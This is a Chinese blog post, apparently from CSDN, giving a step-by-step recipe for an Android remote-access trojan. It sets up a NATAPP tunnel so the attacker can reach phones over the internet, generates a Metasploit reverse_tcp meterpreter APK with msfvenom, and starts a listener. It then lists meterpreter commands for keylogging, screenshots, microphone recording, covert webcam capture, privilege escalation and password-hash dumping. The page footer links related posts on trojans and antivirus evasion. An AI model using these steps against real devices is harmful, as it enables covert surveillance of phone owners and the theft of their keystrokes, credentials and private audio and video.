Kali之安卓木马

最新推荐文章于 2024-03-02 11:00:17 发布
最新推荐文章于 2024-03-02 11:00:17 发布
阅读量1w 收藏 153
点赞数 14
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38844326/article/details/79365410
版权

Kali linux初体验

Kali linux的安卓木马一般只能在内网操作,要想在监控互联网的安卓手机,必须要使用内网穿透,工具有很多,我使用的是NATAPP。思路如下:

  • 实现内网穿透
  • Metasploit木马操作

一、实现内网穿透

  1. 进入 https://natapp.cn/,根据提示注册并创建免费隧道
  2. 进入 https://natapp.cn/#download下载linux的客户端
  3. 命令行内启动natapp。语句:   ./natapp -authtoken=************ 后面的星号换成自己的authtoken口令(如果提示权限不够  chmod a+x natapp )
  4. 得到服务器地址。ping 一下第一个圈内的服务器。得到ip地址是xxx.x.xx.x    后面位端口号:34611

二、Metasploit木马操作

    5.生成木马APP。然后输入命令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=服务器的ip(上面ping服务器得到的ip) LPORT=34611(上面服务器的端口号) R > /root/apk.apk

34611是设置的端口,显示这个说明已经生成木马成功了,如图:


    6.启动msf。msfconsole 然后输入命令:

use exploit/multi/handler //加载模块
set payload android/meterpreter/reverse_tcp //选择Payload

修改ip与端口
set LHOST 127.0.0.1 //这里的地址设置成NATAPP中配置的本地ip
set LPORT 2018 //这里的地址设置成NATAPP中配置的本地端口

exploit //开始监听等待木马响应

下面是一些木马的常用命令:

enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)

PS:键盘记录注意点,先开始,后下载,再结束,否则会出错

摄像头:Stdapi: Webcam Commands(摄像头命令)

record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat      -->开始视频聊天(视频,对方会有弹窗)

webcam_list      -->单摄像头(查看摄像头列表)

webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)


其他命令操作

getsystem        -->获取高权限
 
hashdump         -->获取当前用户hash



李木一_
关注
  • 14
    点赞
  • 153
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
kali linux msf系列视频教程
10-25
kali linux msf系列教程 -------------------------------------------- kali msf 系列 第一章虚拟机使用 kali msf 系列 第一章虚拟机使用 kali msf 系列 第二章MSF基础使用+第一个实验 kali msf 系列 第三章浏览器漏洞提权 kali msf 系列 第四章利用快捷方式漏洞进行渗透提权 kali msf 系列 第五章利用PDF渗透提权 kali msf 系列 第六章爆破模块讲解 kali msf 系列 第七章木马生成 kali msf 系列 第八章木马免杀 kali msf 系列 第九章持续控制
图片后门恶意捆绑工具FackImageexploer
dfdhxb995397的博客
12-27 653
本文作者:夜莺 今天向大家提个醒,最近有一款工具名叫FackImageexploer,该工具能够将恶意的.bat和.exe程序与图片绑定在一起,假若受害者点击了图片,就会反弹个shell给不法分子,如此我们就被别人控制了。这里讲述下不法分子是如何利用这个工具去生成恶意图片。 首先,在Kali中输入以下地址去下载我们的工具: git clonehttps://github....
Kali Linux下利用MSF生成木马入侵同局域网下的电脑(详细版)
孟俊宇的博客
03-02 664
本文详细的介绍了在Kali Linux下利用MSF生成木马入侵局域网下电脑的所有命令
kali系统中使用weevely创建木马(合并成图片木马
qq_44635376的博客
01-29 6327
这里写目录标题weevely:kali中的军刀图片木马 weevely:kali中的军刀 创建木马: weevely generate <password> filename.php 连接木马: weevely [url] <password> 图片木马 windows环境制作木马之copy命令 copy image.png/b + muma.php picmuma.png linux环境制作木马之cat命令 cat image.png muma.php > picmum
[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。
2301_77111744的博客
07-01 652
【[一颗花生](仅供学习)纯手工注入msf安卓木马实现捆绑。-- 连接WLAN网络和断开连接 -->-- 新建/修改/删除通话记录 -->-- 读取手机状态和身份 -->-- 查看WLAN连接 -->-- 接收讯息(短信) -->-- 请求忽略电池优化 -->-- 修改您的通讯录 -->-- 拍摄照片和视频 -->-- 查看网络连接 -->-- 修改系统设置 -->-- 读取通话记录 -->-- 防止手机休眠 -->-- 读取联系人 -->-- 发送短信 -->-- 拨打电话 -->
Android 下 APK 捆绑器的实现
tiandyoin的专栏
04-08 1万+
Android 下 APK 捆绑器的实现                    作者: 海东青 利用捆绑器向正常程序捆绑病毒、木马等恶意程序,以达到隐蔽安装、运行的目的,这 在 Windows 平台下是一种很常规的攻击手段。那么,在智能终端十分流行的今天,如何实 现针对手机应用的捆绑器呢?对此,本文针对 Android 平台的应用程序 APK 文件,给出了 类似 Windows 下捆绑器
KaLi木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4429
KaLi木马渗透实战案例
【记录】kali制作绕过火绒检测的木马(仅通过MSF的方式)
热门推荐
weixin_44647915的博客
04-18 1万+
目的:制作一个能够绕过火绒检测的简单木马,熟悉一下怎么使用msfvenom制作木马,因此此处使用的火绒版本较低。 工具准备:火绒安全-3.0.42.0 下载文章:火绒历史全版本 百度网盘链接:https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw 提取码:kr72 实验环境:kali-2019.4 (攻击方,IP:192.168.152.134)、win10(靶机) 【知识补充】 关于Msfvenom: (msfvenom ----a Metasploi
利用msfvenom与metasploit入侵windows
qq284489030的博客
05-10 821
利用msfvenom生成木马 配置metasploit监听端口上线 目标主机:windows7 启动kali输入命令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP 端口 -f exe -o /root/name.exe 然后msf配置过程你们懂的 msf > use exploit/multi/handler Ms...
Kali Linux使用MSF木马入侵安卓手机
philip_z的博客
02-13 7627
Kali Linux使用MSF木马入侵安卓手机
Kali Linux使用Metasploit生成木马入侵安卓系统
简介
02-24 7807
前言,前言这是我最难想出来的对,这是我最后一篇文章,周一我们开学了,漏洞实战怕实现不了,至少放假可以更文章,我们只放一天,提示:以下是本篇文章正文内容,下面案例可供参考时间不够了,所以不做演示了,所以再见。
kali for android让你的安卓设备跑起kali.docx
08-20
kali for android让你的安卓设备跑起kali.docx
网络安全之配置Kali教程
12-23
kali安装 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。每一季度更新一次。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来...
KALI渗透测试之密码破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
安卓——Kali_linux操作文档.docx
08-20
详细讲解在安卓手机上安装配置kali Linux。
安卓手机跑Kali Linux系统
05-12
自己整理的一份在安卓手机上跑Kali Linux系统,希望对各位有帮助
多图表实现员工满意度调查数据分析python
04-22
员工满意度是指员工对于工作环境、待遇、职业发展和组织管理等方面的满意程度。它是衡量员工对工作的整体感受和情绪状态的重要指标。
2020届软件工程本科毕业生毕业设计项目.zip
04-22
2020届软件工程本科毕业生毕业设计项目
基于stm32平衡小车
最新发布
04-22
平衡小车 基于stm32 平衡小车 基于stm32 平衡小车 基于stm32
kali生成寒武纪木马
09-22
kali可以用于生成寒武纪木马程序。寒武纪木马程序是一种后渗透测试工具,用于测试系统的安全性和漏洞。首先,你需要在kali中打开终端,并使用msfvenom命令生成木马程序。生成木马程序的命令示例如下: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击机IP> LPORT=<监听端口> -f exe > <木马文件名>.exe 其中<攻击机IP>是你的kali机器的IP地址,<监听端口>是你用于监听的端口号,<木马文件名>是你自己定义的木马程序的文件名。 生成木马程序之后,你可以将它传输到目标机器上,然后在目标机器上执行该程序。一旦目标机器上的木马程序被执行,kali机器就可以与目标机器建立连接,并获取对目标机器的控制权。 请注意,这个操作只能在合法的渗透测试环境中进行,任何非法使用都是违法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值